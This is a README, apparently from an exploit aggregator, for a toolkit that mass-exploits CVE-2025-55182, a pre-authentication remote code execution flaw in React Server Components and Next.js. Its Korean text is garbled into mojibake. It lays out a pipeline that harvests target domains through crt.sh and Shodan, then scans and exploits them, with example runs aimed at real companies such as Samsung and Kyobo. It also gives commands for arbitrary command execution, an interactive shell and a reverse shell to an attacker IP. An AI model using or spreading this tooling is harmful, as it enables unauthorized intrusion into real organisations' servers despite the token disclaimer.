Share
## https://sploitus.com/exploit?id=C5A21AEF-804D-5AA7-856A-81052E267A3A
# CVE-2025-55182 Exploit Toolkit
React Server Components Pre-Authentication RCE (CVSS 10.0)
## Directory Structure
```
C:\Users\king0\Desktop\POC\2025\55182\
β
βββ tools/ # μ체 κ°λ° λꡬ
β βββ auto_exploit.py # μ 체 μλν νμ΄νλΌμΈ
β βββ multi_scanner.py # λ©ν° νκ² μ€μΊλ
β βββ domain_finder.py # λλ©μΈ νμ (.com λ±)
β βββ target_finder.py # νκ² νμ (crt.sh, Shodan)
β βββ cve_2025_55182_workflow.py # ν΅μ¬ μ΅μ€νλ‘μ λͺ¨λ
β
βββ poc/ # GitHub POC λͺ¨μ
β βββ Chocapikk-CVE-2025-55182/ # Python exploit + Docker Lab
β βββ l4rm4nd-CVE-2025-55182/ # Docker lab + Nuclei template
β βββ react2shell-scanner/ # Node.js scanner (gensecaihq)
β βββ whiteov3rflow-CVE-2025-55182-poc/ # Simple Python exploit
β
βββ results/ # μ€μΊ κ²°κ³Ό
β βββ results_*/ # κΈ°μ
λ³ κ²°κ³Ό ν΄λ
β
βββ README.md
```
---
## Quick Start
### 1. μλν νμ΄νλΌμΈ (κ°μ₯ κ°νΈ)
```bash
cd tools
python auto_exploit.py -t kyobo
python auto_exploit.py -t samsung -v
```
μλμΌλ‘:
1. λλ©μΈ μμ§ (crt.sh, μλΈλλ©μΈ μμ±)
2. Next.js μ¬μ΄νΈ νν°λ§
3. μ·¨μ½μ μ€μΊ
4. μ·¨μ½μ κ²μ¦
5. λ³΄κ³ μ μμ±
### 2. λ©ν° μ€μΊλ (URL 볡λΆ)
```bash
cd tools
python multi_scanner.py
```
URL λ³΅λΆ ν Enter λ λ²:
```
https://target1.com
https://target2.com
https://target3.com
```
### 3. λ¨μΌ νκ² μ΅μ€νλ‘μ
```bash
cd tools
# μ€μΊλ§
python cve_2025_55182_workflow.py -u https://target.com --scan-only
# κ²μ¦
python cve_2025_55182_workflow.py -u https://target.com --verify-only
# λͺ
λ Ή μ€ν
python cve_2025_55182_workflow.py -u https://target.com -c "id"
# μΈν°λν°λΈ μ
python cve_2025_55182_workflow.py -u https://target.com --shell
# 리λ²μ€ μ
python cve_2025_55182_workflow.py -u https://target.com --reverse -l YOUR_IP -p 4444
```
---
## Tools Overview
| λꡬ | μ€λͺ
| μ¬μ©λ² |
|------|------|--------|
| `auto_exploit.py` | μ 체 μλν | `-t κΈ°μ
λͺ
` |
| `multi_scanner.py` | λ©ν° νκ² μ€μΊ | URL λ³΅λΆ λλ `-f file.txt` |
| `domain_finder.py` | .com λλ©μΈ νμ | `--tranco`, `--known` |
| `target_finder.py` | μλΈλλ©μΈ νμ | `--crtsh -d domain.com` |
| `cve_2025_55182_workflow.py` | ν΅μ¬ μ΅μ€νλ‘μ | `-u URL -c "cmd"` |
---
## Lab Environment (ν
μ€νΈμ©)
```bash
# μ·¨μ½ν νκ²½ μ€ν
docker run --rm -p 3000:3000 ghcr.io/l4rm4nd/cve-2025-55182:latest
# ν
μ€νΈ
cd tools
python cve_2025_55182_workflow.py -u http://127.0.0.1:3000 -c "id"
```
---
## Vulnerability Info
| Item | Value |
|------|-------|
| CVE | CVE-2025-55182 |
| CVSS | 10.0 (Critical) |
| Type | Pre-Auth RCE |
| Vector | Prototype Pollution β RCE |
| Discovered | 2025-11-29 |
### Affected Versions
- **Next.js**: 15.0.0-15.5.6, 16.0.0-16.0.6
- **react-server-dom-***: 19.0.0, 19.1.0-19.1.1, 19.2.0
### Patched Versions
- **Next.js**: 15.0.5, 15.1.9, 15.2.6, ..., 16.0.7
- **react-server-dom-***: 19.0.1, 19.1.2, 19.2.1
---
## Requirements
```bash
pip install requests urllib3 colorama
```
---
## Disclaimer
For authorized security testing only. Obtain proper authorization before testing.